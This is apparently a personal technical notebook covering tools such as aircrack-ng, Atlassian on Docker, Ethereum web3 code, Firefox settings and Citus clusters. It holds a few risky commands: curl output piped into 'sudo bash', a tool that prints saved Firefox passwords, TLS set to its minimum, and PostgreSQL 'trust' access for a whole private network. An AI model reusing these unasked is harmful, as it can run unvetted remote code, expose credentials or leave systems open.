52 Version Control System 377 52.1 Git...... 377 52.1.1 Set push.default...... 377 52.1.2 Untrack and stop tracking files in git...... 378 52.1.3 Create new git project in bitbucket...... 378 52.1.4 Remove local (untracked) files from current Git branch...... 378 52.1.5 Install Git...... 378 52.1.6 Configure Git...... 378 52.1.7 git commit as different user...... 379 52.1.8 Setting your username and email in Git...... 379 52.1.9 Setting up a git server...... 380 52.1.10 How do you discard unstaged changes in Git?...... 381 xvi 52.1.11 Working on API...... 381 52.1.12 Find good forks on GitHub...... 382 52.1.13 IDE...... 382 52.1.14 Undo changes in one file...... 382 52.1.15 List local and remote branches...... 382 52.1.16 List remote branches...... 382 52.1.17 List only local branches...... 382 52.1.18 Delete a Git branch both locally and remotely...... 382 52.1.19 Merge a git branch into master...... 383 52.1.20 Remove last commit from remote git repository...... 383 52.1.21 Undo the last commit from local...... 383 52.1.22 Revert to specific commit...... 383 52.1.23 19 Tips For Everyday Git Use...... 383 52.1.24 How to Write a Git Commit Message...... 384 52.1.25 Adding an existing project to GitHub using the command line...... 384 52.1.26 Add tag...... 384 52.1.27 Tag an older commit in Git?...... 385 52.1.28 Push a tag to a remote repository...... 385 52.1.29 Remove (delete) a tag...... 385 52.1.30 Github “fatal: remote origin already exists”...... 385 52.1.31 Install specific git commit with pip...... 385 52.1.32 Rewriting the most recent commit message...... 385 52.1.33 git subtrees...... 386 52.1.34 Git fetch remote branch...... 386 52.1.35 Sample release...... 386 52.1.36 Warning: push.default is unset; its implicit value is changing in Git 2.0...... 386 52.1.37 Fatal: The upstream branch of your current branch does not match the name of your current branch...... 387 52.1.38 Abort the merge...... 387 52.1.39 Track remote branch that doesn’t exist on local...... 387 52.1.40 Fix git remote fatal: index-pack failed...... 388 52.2 Hg...... 388

53 389 53.1 LXC...... 389 53.2 DOCKER...... 390 53.2.1 Create base kali image...... 391 53.2.2 Install docker on Debian ...... 391 53.2.3 Install docker on Ubuntu Server ...... 392 53.2.4 Set HTTP Proxy for docker...... 392 53.2.5 Set HTTP Proxy for docker on Ubuntu 12.04.3 LTS...... 392 53.2.6 how to let docker container work with sshuttle?...... 392 53.2.7 How can I use docker without sudo?...... 393 53.2.8 Install Docker Compose...... 393 53.2.9 Docker Compose...... 393 53.2.10 Install docker machine...... 393 53.2.11 How to use docker machine...... 393 53.2.12 Docker toolbox...... 394 53.2.13 Others:...... 394 53.2.14 Docker misconceptions...... 395 53.2.15 Service orchestration and management tool...... 395 53.2.16 Docker on multi host...... 395 53.2.17 docker machine...... 396 53.2.18 How to run a command on an already existing docker container?...... 396

xvii 53.2.19 Removing Docker data volumes?...... 396 53.2.20 Clear log history...... 396 53.2.21 Set maximum concurrent download for docker pull...... 396 53.2.22 Override the ENTRYPOINT using docker run...... 397 53.2.23 Set image name when building a custom image...... 397 53.2.24 Set environment variables during the build in docker...... 397 53.2.25 Remove unused, , untag docker images file...... 397 53.2.26 Disable auto-restart on a container...... 397 53.2.27 Minimal base docker OS images...... 397 53.3 Virtual box...... 398 53.3.1 Install latest version...... 398 53.3.2 Unistall running virtualbox...... 398 53.4 Wine...... 398 53.4.1 Wine PATH through command line...... 398

54 Indices and tables 399

xviii Omid Raha MyStack Documentation, Release 0.1

Hi ! I’m Omid Raha, Here i am gathering some notes from my experience on some subjects that I worked on them. Contents:

Contents 1 Omid Raha MyStack Documentation, Release 0.1

2 Contents CHAPTER 1

Aircrack-ng

Contents:

1.1 Install

1.1.1 Install aircrack-ng 1.2-beta1 from source http://www.aircrack-ng.org/doku.php?id=install_aircrack#installing_aircrack-ng_from_source ://github.com/aircrack-ng/aircrack-ng apt-get install build-essential wget http://download.aircrack-ng.org/aircrack-ng-1.2-beta1.tar.gz tar -zxvf aircrack-ng-1.2-beta1.tar.gz cd aircrack-ng-1.2-beta1 make sqlite=true unstable=true make sqlite=true unstable=true install airodump-ng-oui-update # to install or update Airodump-ng OUI file

3 Omid Raha MyStack Documentation, Release 0.1

4 Chapter 1. Aircrack-ng CHAPTER 2

APPLE

Contents:

2.1 Tips

2.1.1 Apple ID https://appleid.apple.com/#!&page=create https://appleid.apple.com/account/manage/

2.1.2 Hackintosh https://github.com/huangyz0918/Hackintosh-Installer-University https://github.com/LER0ever/Hackintosh http://x220.mcdonnelltech.com/ https://www.tonymacx86.com/threads/n552vw-asus-vivobook.225952/ https://www.tonymacx86.com/threads/guide-booting-the-os-x-installer-on-laptops-with-clover.148093/ https://www.tonymacx86.com/el-capitan-laptop-support/164990-faq-read-first-laptop-frequent-questions.html https://www.tonymacx86.com/threads/faq-read-first-laptop-frequent-questions.164990/ https://www.tonymacx86.com/threads/unibeast-install-macos-high-sierra-on-any-supported--based-pc.235474/ #download

5 Omid Raha MyStack Documentation, Release 0.1

6 Chapter 2. APPLE CHAPTER 3

Astronomy

Rosetta spacecraft, Philae probe lands M42 67P/Churyumov-Gerasim

3.1 astronomical unit (AU, or au)

A unit of length effectively equal to the average, or mean, distance between Earth and the Sun, defined as 149,597,870.7 km

3.2 What Is the Distance Between Earth and Mars?

The minimum distance from the Earth to Mars is about 54.6 million kilometers. The farthest apart they can be is about 401 million km. The average distance is about 225 million km.

3.3 What is the Distance to the Moon?

The average distance to the Moon is 384,403 km

3.4 What Is the Distance Between Earth and sun?

149,600,000 km

7 Omid Raha MyStack Documentation, Release 0.1

3.5 Software stellarium celestia Starry Night

3.6 Galaxy

Andromeda galaxy

8 Chapter 3. Astronomy CHAPTER 4

Atlassian

Contents:

4.1 Tips

4.1.1 Atlassian installation approach

Install Atlassian Jira and atlassian-confluence with docker images by cptactionhank: https://github.com/cptactionhank https://github.com/cptactionhank/docker-atlassian-jira http://cptactionhank.github.io/docker-atlassian-jira/ https://hub.docker.com/r/cptactionhank/atlassian-jira/ https://github.com/cptactionhank/docker-atlassian-confluence http://cptactionhank.github.io/docker-atlassian-confluence/ Install Atlassian Bitbucket Server with docker image by Atlassian: https://bitbucket.org/atlassian/docker-atlassian-bitbucket-server/overview https://hub.docker.com/r/atlassian/bitbucket-server/ Install Atlassian Bitbucket Server on the cloud with docker images by Atlassian: https://developer.atlassian.com/blog/2015/12/atlassian-docker-orchestration/ Videos: http://www.youtube.com/watch?v=mqVMoUjmkP0 http://www.youtube.com/watch?v=zhAT-gZcpBM Other links:

9 Omid Raha MyStack Documentation, Release 0.1 https://bitbucket.org/atlassian/bamboo-docker-plugin

4.1.2 Atlassian license Prices

Bitbucker server https://www.atlassian.com/software/bitbucket/pricing?tab=host-on-your-server https://www.atlassian.com/licensing/bitbucket-server/ Confluence https://www.atlassian.com/software/confluence/pricing?tab=host-on-your-server https://www.atlassian.com/licensing/confluence/ JIRA https://www.atlassian.com/software/jira/pricing?tab=host-on-your-server#tab-9eb6ae11 https://es.atlassian.com/licensing/jira-software HipChat https://www.hipchat.com/pricing https://www.hipchat.com/server#pricing-show https://www.atlassian.com/purchase/product/com.atlassian.hipchat.server https://blog.hipchat.com/2014/05/27/hipchat-is-now-free-for-unlimited-users/ Others: https://confluence.atlassian.com/display/CLOUDKB/Pros+and+Cons+of+Cloud+vs.+Server https://confluence.atlassian.com/bitbucket/associate-an-existing-domain-with-an-account-221449746.html https://jira.atlassian.com/browse/CLOUD-6999?src=confmacro For local server payment is one-time payment and include 12 months of software maintenance (support and updates).

Product Users(up to) Your Own Server(one-time payment)

˓→Atlassian Cloud server(per month)

Bitbucket server 5x

˓→Free 10 10$

˓→10$ 251,800$

˓→25$ 503,300$

˓→50$ JIRA 10 10$

˓→10$ 15x

˓→75$ 251,800$

˓→150$ 503,300$

˓→300$ (continues on next page)

10 Chapter 4. Atlassian Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) Confluence 10 10$

˓→10$ 15x

˓→50$ 251,200$

˓→100$ 502,200$

˓→200$ HipChat Basic x

˓→Free

HipChat Plus x

˓→2$(per user/month) 10 10$/year

˓→x 251,800$/year

˓→x 503,300/year

˓→x

HipChat Basic Group chat Instant messaging File sharing Unlimited users and integrations HipChat Plus Video chat Screensharing File sharing Unlimited users and integrations Much more Sample Own Server prices: 2GB/ 2 Core 20$/month 4GB/ 2 Core 40$/month

4.1.3 Run Jira with docker

$ docker pull cptactionhank/atlassian-jira:latest

$ docker run -p 80:8080 -v /home/rsa/workspace/docker/atlassian/jira:/var/atlassian/

˓→jira --env "CATALINA_OPTS=-Xms64m -Xmx768m -Datlassian.plugins.enable.wait=300"

˓→cptactionhank/atlassian-jira:latest

$ docker create --restart=no --name "jira-container" -p 80:8080 -v /home/or/

˓→workspace/docker/atlassian/jira:/var/atlassian/jira --env "CATALINA_OPTS=-Xms64m -

˓→Xmx768m -Datlassian.plugins.enable.wait=300" cptactionhank/atlassian-jira:latest $ docker start --attach "jira-container"

Data Directories: /var/atlassian/jira Expose Ports: 8080 https://hub.docker.com/r/cptactionhank/atlassian-jira/

4.1. Tips 11 Omid Raha MyStack Documentation, Release 0.1 https://github.com/cptactionhank/docker-atlassian-jira http://cptactionhank.github.io/docker-atlassian-jira/

4.1.4 Run Confluence with docker

$ docker pull cptactionhank/atlassian-confluence:latest

$ docker run docker run -p 80:8090 -v /home/or/workspace/docker/atlassian/confluence:/

˓→var/atlassian/confluence --env "CATALINA_OPTS=-Xms64m -Xmx768m -Datlassian.plugins.

˓→enable.wait=300" cptactionhank/atlassian-confluence:latest

Data Directories: /var/atlassian/confluence Expose Ports: 8080 https://hub.docker.com/r/cptactionhank/atlassian-confluence/ https://github.com/cptactionhank/docker-atlassian-confluence http://cptactionhank.github.io/docker-atlassian-confluence/

4.1.5 Run Bitbucket Server with docker

$ docker pull atlassian/bitbucket-server $ docker run -v /home/or/workspace/docker/atlassian/bitbucket:/var/atlassian/

˓→application-data/bitbucket -p 7990:7990 -p 7999:7999 atlassian/bitbucket-server

Expose Ports: 7990 7999 Data Directories: /var/atlassian/application-data/bitbucket https://hub.docker.com/r/atlassian/bitbucket-server/

4.1.6 JIRA is Unable to Start due to Could not create necessary subdirectory

# on host system $ mkdir / $ mkdir /home/or/workspace/docker/atlassian/jira/ $ sudo chown -R : / $ sudo chown -R :daemon /home/or/workspace/docker/ https://confluence.atlassian.com/display/JIRAKB/JIRA+is+Unable+to+Start+due+to+Could+not+create+necessary+ subdirectory https://github.com/docker/docker/issues/2259

12 Chapter 4. Atlassian Omid Raha MyStack Documentation, Release 0.1

4.1.7 Atlassian Docker compose file jira: image: cptactionhank/atlassian-jira:7.0.5 restart: always links: - database volumes: - ~/workspace/docker/atlassian/jira:/var/atlassian/jira confluence: image: cptactionhank/atlassian-confluence:5.9.4 restart: always links: - database volumes: - ~/workspace/docker/atlassian/confluence:/var/atlassian/confluence bitbucket: image: atlassian/bitbucket-server:4.3: restart: always links: - database volumes: - ~/workspace/docker/atlassian/bitbucket:/var/atlassian/application-data/bitbucket database: image: postgres:9.4 restart: always volumes: - ~/workspace/docker/postgres:/var/lib/postgresql/data nginx: image: nginx restart: always ports: -"80:80" links: - jira - confluence - bitbucket volumes: - ./config/nginx/nginx.conf:/etc/nginx/nginx.conf:ro

The nginx.conf file: user nginx; worker_processes1; error_log /var/log/nginx/error.log warn; pid /var/run/nginx.pid; events{ worker_connections 1024; }

(continues on next page)

4.1. Tips 13 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) http{ include /etc/nginx/mime.types; default_type application/octet-stream;

log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"';

access_log /var/log/nginx/access.log main;

sendfile on; #tcp_nopush on;

keepalive_timeout 65;

#gzip on;

include /etc/nginx/conf.d/*.conf;

proxy_connect_timeout 600; proxy_send_timeout 600; proxy_read_timeout 600; send_timeout 600; client_max_body_size0;

server{ listen 80; server_name jira.example.com www.jira.example.com;

location /{ proxy_pass http://jira:8080;

proxy_set_header X-Forwarded-Host $host; proxy_set_header X-Forwarded-Server $host; proxy_set_header X-Forwarded-For $remote_addr; proxy_set_header X-Real-IP $remote_addr;

proxy_set_header Host $host;

} }

server{ listen 80; server_name wiki.example.com www.wiki.example.com;

location /{ proxy_pass http://confluence:8090;

proxy_set_header X-Forwarded-Host $host; proxy_set_header X-Forwarded-Server $host; proxy_set_header X-Forwarded-For $remote_addr; proxy_set_header X-Real-IP $remote_addr;

proxy_set_header Host $host; } (continues on next page)

14 Chapter 4. Atlassian Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) }

server{ listen 80; server_name bitbucket.example.com www.bitbucket.example.com;

location /{ proxy_pass http://bitbucket:7990;

proxy_set_header X-Forwarded-Host $host; proxy_set_header X-Forwarded-Server $host; proxy_set_header X-Forwarded-For $remote_addr; proxy_set_header X-Real-IP $remote_addr;

proxy_set_header Host $host; } } }

$ mkdir -p ~/workspace/docker/atlassian/jira $ mkdir -p ~/workspace/docker/atlassian/confluence $ mkdir -p ~/workspace/docker/atlassian/bitbucket $ mkdir -p ~/workspace/docker/postgres $ mkdir -p ~/workspace/docker/nginx

$ sudo chown -R daemon:daemon ~/workspace/docker/atlassian

$ docker-compose ps

$ docker exec -it atlassian_jira_1 bash

$ docker-compose.yaml $ docker-compose up https://confluence.atlassian.com/display/BitbucketServerKB/Git+push+fails+-+client+intended+to+send+too+large+ chunked+body

4.1.8 Backup atlassian product

Automating JIRA Backups The XML backup includes all data in the database. However, it does not include your attachments direc- tory, JIRA Home Directory or JIRA Installation Directory, which are stored on the filesystem. You can also perform XML backups manually. See Backing Up Data for details. Be aware that after installing JIRA and running the setup wizard, a backup service will automatically be configured to run every 12 hours. For production use or large JIRA installations, it is strongly recommended that you use native database- specific tools instead of the XML backup service. XML backups are not guaranteed to be consistent, as the database may be updated during the backup process. Inconsistent backups are created successfully without any warnings or error , but fail during the restore process. Database-native tools offer a much more consistent and reliable means of storing data. https://confluence.atlassian.com/jira/automating-jira-backups-185729637.html Backing Up Data

4.1. Tips 15 Omid Raha MyStack Documentation, Release 0.1

This page describes how to back up your JIRA data, and establish processes for maintaining continual backups. Backing up your JIRA data is the first step in upgrading your server to a new JIRA revision, or splitting your JIRA instance across multiple servers. See also Restoring JIRA data and Restoring a Project from Backup. Creating a complete backup of JIRA consists of two stages: 1. Backing up database contents • Using native database backup tools • Using JIRA’s XML backup utility 2. Backing up the data directory https://confluence.atlassian.com/jira/backing-up-data-185729581.html#BackingUpData-Usingnativedatabasebackuptools Postgres File System Level Backup http://www.postgresql.org/docs/9.3/static/backup-file.html Using Rsync and SSH http://troy.jdmz.net/rsync/index.html

4.1.9 Bamboo https://confluence.atlassian.com/bamboo/getting-started-with-docker-and-bamboo-687213473.html http://blogs.atlassian.com/2015/09/bamboo-docker-building-web-apps/?utm_source=twitter&utm_medium=social& utm_campaign=atlassian_bamboo-docker-addteq http://www.systemsthoughts.com/2015/5-things-i-learned-using-docker-for-bamboo/ https://realpython.com/blog/python/django-development-with-docker-compose-and-machine/ https://pometeam.atlassian.net/builds/build/admin/ajax/viewAvailableVariables.action?planKey=POG-TEST-JOB1 https://realpython.com/blog/python/django-development-with-docker-compose-and-machine/ http://stackoverflow.com/questions/1419629/atlassian-bamboo-with-django-python-possible https://jira.atlassian.com/browse/BAM-11368 https://answers.atlassian.com/questions/35809/how-to-parse-django-tests-with-bamboo http://mike-clarke.com/2013/11/docker-links-and-runtime-env-vars/ http://stackoverflow.com/questions/31746182/docker-compose-wait-for-container-x-before-starting-y https://github.com/docker/compose/issues/374 http://stackoverflow.com/questions/29377853/how-to-use-environment-variables-in-docker-compose https://confluence.atlassian.com/bamboocloud/bamboo-variables-737184363.html echo ${bamboo.agentWorkingDirectory} echo ${bamboo.build.working.directory} https://pometeam.atlassian.net/builds/admin/agent/addRemoteAgent.action nohup java -jar atlassian-bamboo-agent-installer-5.10-OD-13-001.jar https://pometeam.atlassian.net/builds/ agentServer/ -t > /dev/null 2>&1 &

16 Chapter 4. Atlassian CHAPTER 5

benchmark

Contents:

5.1 Tips

5.1.1 Using Apache Bench for Simple Load Testing

$ ab -n 1000 - 10 http://localhost/ http://stackoverflow.com/questions/12732182/ab-load-testing

17 Omid Raha MyStack Documentation, Release 0.1

18 Chapter 5. benchmark CHAPTER 6

Block Chain

Contents:

6.1 Tips

6.2 Ethereum https://www.infura.io/register from eth_account.messages import defunct_hash_message from solc import compile_source from web3 import Web3 from web3.providers.rpc import HTTPProvider endpoint_url='https://ropsten.infura.io/v3/549a3096fb7d410381ba844e3930cfc5' web3= Web3(HTTPProvider(endpoint_url))

# https://web3py.readthedocs.io/en/latest/web3.eth.account.html def create_keys(): account= web3.eth.account.create() return account.address, account.privateKey def sign_message(text, private_key): message_hash= defunct_hash_message(text=text) signed_message= web3.eth.account.signHash(message_hash, private_key=private_key) return message_hash, signed_message def verify_message(text, signed_message): (continues on next page)

19 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) message_hash= defunct_hash_message(text=text) recover= web3.eth.account.recoverHash(message_hash, signature=signed_message.

˓→signature) return recover def verify_message_from_message_hash(message_hash, signature): recover= web3.eth.account.recoverHash(message_hash, signature=signature) return recover

# Solidity source code contract_source_code= ''' pragma solidity ^0.4.21; contract Greeter { string public greeting;

function Greeter() public { greeting ='Hello'; }

function setGreeting(string _greeting) public { greeting = _greeting; }

function greet() view public returns (string) { return greeting; } } ''' address, pk= create_keys() address= web3.toChecksumAddress(address) compiled_sol= compile_source(contract_source_code) # Compiled source code contract_interface= compiled_sol[':Greeter'] print('web3.eth.blockNumber', web3.eth.blockNumber) abi, bytecode= contract_interface['abi'], contract_interface['bin'] contract= web3.eth.contract(bytecode=bytecode, abi=abi) print('address', address)

# sample valid address to_address= web3.toChecksumAddress('0x7f508c2666a3b40598572d7232ec4fb95162fd9a') transaction={ 'to': to_address, 'value': 1000000000000000000, 'gas': 4700000, 'gasPrice': web3.eth.gasPrice, 'nonce': web3.eth.getTransactionCount(address) } (continues on next page)

20 Chapter 6. Block Chain Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) tx= contract.buildTransaction(transaction).setGreeting('Omid') signed= web3.eth.account.signTransaction(tx, pk) final= web3.eth.sendRawTransaction(signed.rawTransaction) print('final', final) print('fin:', web3.toHex(final))

############################### transaction={ 'to': to_address, 'value': 1000000000000000000, 'gas': 4700000, 'gasPrice': web3.eth.gasPrice, 'nonce': web3.eth.getTransactionCount(address), 'data':b'A' * 32655 } signed= web3.eth.account.signTransaction(transaction, pk) final= web3.eth.sendRawTransaction(signed.rawTransaction) print('final', final) print('fin:', web3.toHex(final))

###############################

6.2.1 Solidity https://github.com/ethereum/py-solc

$ pip install py-solc $ python -m solc.install v0.4.21 $ export PATH="~/.py-solc/solc-v0.4.21/bin/:$PATH"

6.2.2 Online solidity https://remix.ethereum.org/#optimize=true&version=builtin https://ethereum.github.io/browser-solidity/#optimize=false&version=soljson-v0.4.25-nightly.2018.9.10+commit. 86d85025.js

6.2.3 Links https://ropsten.etherscan.io/tx/ https://hackernoon.com/ethereum-smart-contracts-in-python-a-comprehensive-ish-guide-771b03990988 https://chrome.google.com/webstore/detail/metamask/nkbihfbeogaeaoehlefnkodbefgpgknn?hl=en https://ethereum.stackexchange.com/questions/11495/best-way-to-test-a-smart-contract

6.2. Ethereum 21 Omid Raha MyStack Documentation, Release 0.1 https://metamask.io/ https://faucet.metamask.io/ https://gist.github.com/Kcrong/1f832a2f4ab861da3d852c5b0a30ef47 http://justin.yackoski.name/winp/ https://web3py.readthedocs.io/en/stable/contracts.html#contract-deployment-example

22 Chapter 6. Block Chain CHAPTER 7

Browser

Contents:

7.1 Firefox

$ aptitude install nss-passwords $ nss-passwords example.com | http://example.com | USERNAME | PASSWORD |

7.1.1 Disable Dns Cache

Type in about:config in the address bar Right click on the list of Properties and select New > Integer in the Context menu Enter network.dnsCacheExpiration as the preference name and 0 as the integer value When disabled, Firefox will use the DNS cache provided by the OS. http://en.kioskea.net/faq/555-disabling-the-dns-cache-in-mozilla-firefox

7.1.2 Increase download them all maximum segments

Type in about:config in the address bar Type extensions.dta.maxchunks and change number you want. After that, don’t change it from download them all panel.

23 Omid Raha MyStack Documentation, Release 0.1

7.1.3 Set security tls

Go to about:config , and set: security.tls.version.min 0 security.tls.version.max 0 # default is 3

7.1.4 Disable automatic loading of Images in Firefox

Go to about:config, search for this option “permissions.default.image” change to 1. Possible values: 1 – always load the images 2 – never load the images 3 – don’t load third images

7.1.5 Fix Firefox Phishing

The xn– prefix is what is known as an ‘ASCII compatible encoding’ prefix. It lets the browser know that the domain uses ‘punycode’ encoding to represent Unicode characters. In non-techie speak, this means that if you have a domain name with Chinese or other international characters, you can register a domain name with normal A-Z characters that can allow a browser to represent that domain as international characters in the location bar. What we have done above is used ‘e’ ‘p’ ‘i’ and ‘c’ unicode characters that look identical to the real characters but are different unicode characters. In the current version of Chrome, as long as all characters are unicode, it will show the domain in its internationalized form. about:config network.IDN_show_punycode= false https://www.wordfence.com/blog/2017/04/chrome-firefox-unicode-phishing/

7.2 Opera

Add Opera source list

## Add this line for Opera browser ## use "stable" instead of distribution name $ deb http://deb.opera.com/opera stable non-free

Now, we are going to trust Opera : $ sudo su $ wget -O - http://deb.opera.com/archive.key | apt-key add - https://wiki.debian.org/Opera

24 Chapter 7. Browser CHAPTER 8

Ceph

Default crush rule is set to the host level, not the osd level, to change it to osd level, add this to global section of ceph.conf file: osd crush chooseleaf type=0 osd crush chooseleaf type Description: The bucket type to use for chooseleaf in a CRUSH rule. Uses ordinal rank rather than name. Type: 32-bit Integer Default: 1. Typically a host containing one or more Ceph OSD Daemons. Status of the PGS: STUCK UNCLEAN, ACTIVE+CLEAN ceph -s ceph osd tree

25 Omid Raha MyStack Documentation, Release 0.1

26 Chapter 8. Ceph CHAPTER 9

Citus

Contents:

9.1 Tips

9.1.1 Install citus on single machine with docker

# Download docker-compose file $ curl -L https://raw.githubusercontent.com/citusdata/docker/master/docker-compose.

˓→yml > docker-compose.yml

# Run docker-compose file $ COMPOSE_PROJECT_NAME=citus docker-compose up -d

citus_manager python -u ./manager.py Up citus_master docker-entrypoint.sh postgres Up0.0.0.0:5432->5432/tcp citus_worker_1 docker-entrypoint.sh postgres Up 5432/tcp

# Verify installation $ docker exec -it citus_master psql -U postgres postgres=# SELECT * FROM master_get_active_worker_nodes();

node_name | node_port ------+------citus_worker_1 | 5432 (1 row)

# Shutdown $ COMPOSE_PROJECT_NAME=citus docker-compose down -v https://docs.citusdata.com/en/v8.1/installation/single_machine_docker.html

27 Omid Raha MyStack Documentation, Release 0.1

9.1.2 Install citus on a single machine on ubuntu

# Add Citus repository for package manager $ curl https://install.citusdata.com/community/deb.sh | sudo bash

# install the server and initialize db $ sudo apt-get -y install postgresql-11-citus-8.1

# this user has access to sockets in /var/run/postgresql $ sudo su - postgres # include path to postgres binaries $ export PATH=$PATH:/usr/lib/postgresql/11/bin

$ cd~ $ mkdir -p citus/coordinator citus/worker1 citus/worker2

# create three normal postgres instances $ initdb -D citus/coordinator $ initdb -D citus/worker1 $ initdb -D citus/worker2

# Add citus extension to postgres config file $ echo "shared_preload_libraries = 'citus'" >> citus/coordinator/postgresql.conf $ echo "shared_preload_libraries = 'citus'" >> citus/worker1/postgresql.conf $ echo "shared_preload_libraries = 'citus'" >> citus/worker2/postgresql.conf

# Start db $ pg_ctl -D citus/coordinator -o "-p 9700" -l coordinator_logfile start $ pg_ctl -D citus/worker1 -o "-p 9701" -l worker1_logfile start $ pg_ctl -D citus/worker2 -o "-p 9702" -l worker2_logfile start

# Add citus extension $ psql -p 9700 -c "CREATE EXTENSION citus;" $ psql -p 9701 -c "CREATE EXTENSION citus;" $ psql -p 9702 -c "CREATE EXTENSION citus;"

# Register workers on coordinator $ psql -p 9700 -c "SELECT * from master_add_node('localhost', 9701);" $ psql -p 9700 -c "SELECT * from master_add_node('localhost', 9702);"

# Verify installation $ psql -p 9700 -c "select * from master_get_active_worker_nodes();"

node_name | node_port ------+------localhost | 9701 localhost | 9702 (2 rows)

$ psql -p 9700 -c "SELECT * from pg_dist_node;"

nodeid | groupid | nodename | nodeport | noderack | hasmetadata | isactive |

˓→noderole | nodecluster ------+------+------+------+------+------+------+----

˓→------+------1|1 | localhost | 9701 | default | f | t |

˓→primary | default (continues on next page)

28 Chapter 9. Citus Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) 2|2 | localhost | 9702 | default | f | t |

˓→primary | default (2 rows)

# stop db $ pg_ctl -D citus/worker2 stop $ pg_ctl -D citus/worker1 stop $ pg_ctl -D citus/coordinator stop https://docs.citusdata.com/en/v8.1/installation/single_machine_debian.html http://docs.citusdata.com/en/v8.0/develop/api_udf.html#master-add-node http://docs.citusdata.com/en/v8.0/develop/api_udf.html#master-get-active-worker-nodes

9.1.3 Install citus on multi-machine cluster on Ubuntu

For both coordinator and workers:

# Add Citus repository for package manager $ curl https://install.citusdata.com/community/deb.sh | sudo bash

# install the server and initialize db $ sudo apt-get -y install postgresql-11-citus-8.1

# preload citus extension $ sudo pg_conftool 11 main set shared_preload_libraries citus

$ sudo pg_conftool 11 main set listen_addresses' *'

$ sudo vi /etc/postgresql/11/main/pg_hba.conf

# Allow unrestricted access to nodes in the local network. The following ranges # correspond to 24, 20, and 16-bit blocks in Private IPv4 address spaces. host all all 10.0.0.0/8 trust

# Also allow the host unrestricted access to connect to itself host all all 127.0.0.1/32 trust host all all ::1/128 trust

# start the db server $ sudo service postgresql restart # and make it start automatically when computer does $ sudo update-rc.d postgresql enable

# add the citus extension $ sudo -i -u postgres psql -c "CREATE EXTENSION citus;"

Only on coordinator:

# Add workers to dns $ sudo vim /etc/hosts

192.168.0.131 w1 (continues on next page)

9.1. Tips 29 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) 192.168.0.132 w2

# Register workers on coordinator $ sudo -i -u postgres psql -c "SELECT * from master_add_node('w1', 5432);" $ sudo -i -u postgres psql -c "SELECT * from master_add_node('w2', 5432);"

# Verify installation $ sudo -i -u postgres psql -c "SELECT * FROM master_get_active_worker_nodes();"

node_name | node_port ------+------w1 | 5432 w2 | 5432 (2 rows)

# Ready to use $ sudo -i -u postgres psql

https://docs.citusdata.com/en/v8.1/installation/multi_machine_debian.html

9.1.4 Have a unique constraint on one field of table

https://docs.citusdata.com/en/v8.1/faq/faq.html#can-i-create-primary-keys-on-distributed-tables https://stackoverflow.com/a/43660911

9.1.5 Limitation of Citus Community

Re balance, Replicate, Isolate

These three important functions are not available: • rebalance_table_shards • replicate_table_shards • isolate_tenant_to_new_shard When you add and register new node, you can not balance current existing filled data to this new empty node. Tenant isolation is not available. https://github.com/citusdata/citus/issues/828 https://docs.citusdata.com/en/v8.1/admin_guide/cluster_management.html#tenant-isolation

Adding a coordinator

Users can send their queries to any coordinator and scale out performance. If your setup requires you to use multiple coordinators, please contact us. https://docs.citusdata.com/en/v8.1/admin_guide/cluster_management.html#adding-a-coordinator

30 Chapter 9. Citus Omid Raha MyStack Documentation, Release 0.1

Worker Node Failures

Citus supports two modes of replication 1. PostgreSQL streaming replication. 2. Citus shard replication. Only the second one is available, suited for an append-only workload. and setting needs to be done before distributing data to the cluster. https://docs.citusdata.com/en/v8.1/admin_guide/cluster_management.html#worker-node-failures

9.1.6 Django https://docs.citusdata.com/en/v8.1/develop/migration_mt_django.html#django-migration https://github.com/omidraha/citus-exp

9.1. Tips 31 Omid Raha MyStack Documentation, Release 0.1

32 Chapter 9. Citus CHAPTER 10

CockRoachDB

Contents:

10.1 Tips

10.1.1 NewSql https://en.wikipedia.org/wiki/NewSQL

10.1.2 Support SQL and Postgres https://www.cockroachlabs.com/docs/stable/sql-feature-support.html https://www.cockroachlabs.com/docs/v2.1/cockroachdb-in-comparison.html https://www.cockroachlabs.com/blog/why-postgres/ https://www.cockroachlabs.com/docs/v2.1/migrate-from-postgres.html Performance best practice https://www.cockroachlabs.com/docs/stable/performance-best-practices-overview.html Join https://www.cockroachlabs.com/docs/stable/joins.html https://www.cockroachlabs.com/docs/stable/joins.html#performance-best-practices

10.1.3 Support Django https://github.com/cockroachdb/cockroachdb-python/pull/14

33 Omid Raha MyStack Documentation, Release 0.1

10.1.4 Support k8s https://www.cockroachlabs.com/docs/v2.1/orchestrate-cockroachdb-with-kubernetes-multi-cluster.html

10.1.5 Scale https://www.cockroachlabs.com/docs/stable/frequently-asked-questions.html#how-does-cockroachdb-scale https://www.cockroachlabs.com/docs/stable/multi-active-availability.html https://www.cockroachlabs.com/docs/stable/high-availability.html

10.1.6 Performance https://www.cockroachlabs.com/blog/cockroachdb-2dot1-performance/

10.1.7 Deploy multi-node cluster using HAProxy load balancer

Deploy a secure multi-node CockroachDB cluster on multiple machines, using HAProxy load balancers to distribute client traffic. https://www.cockroachlabs.com/docs/stable/deploy-cockroachdb-on-premises.html

10.1.8 Adapting SQLAlchemy to CockroachDB

CockroachDB is similar enough to PostgreSQL that SQLAlchemy’s built-in PostgreSQL dialect gets us most of the way there, but we still need a few tweaks that can be found in our cockroachdb python package. https://www.cockroachlabs.com/blog/building-application-cockroachdb-sqlalchemy-2/ https://www.cockroachlabs.com/docs/stable/build-a-python-app-with-cockroachdb-sqlalchemy.html SqlAlchemy Best Practice https://www.cockroachlabs.com/docs/stable/build-a-python-app-with-cockroachdb-sqlalchemy.html#best-practices

34 Chapter 10. CockRoachDB CHAPTER 11

Cothority

Contents:

11.1 Tips

11.1.1 Install

Setting up Conode on each of servers: Servers: • 192.168.0.180 • 192.168.0.181 • 192.168.0.182

$ docker run -it --rm -p 6879-6880:6879-6880 --name conode -v ~/conode_data:/conode_

˓→data dedis/conode:latest ./conode setup

Output:

Setting up a cothority-server.

Please enter the[address:]PORT for incoming requests[6879]: 192.168.0.180:6879

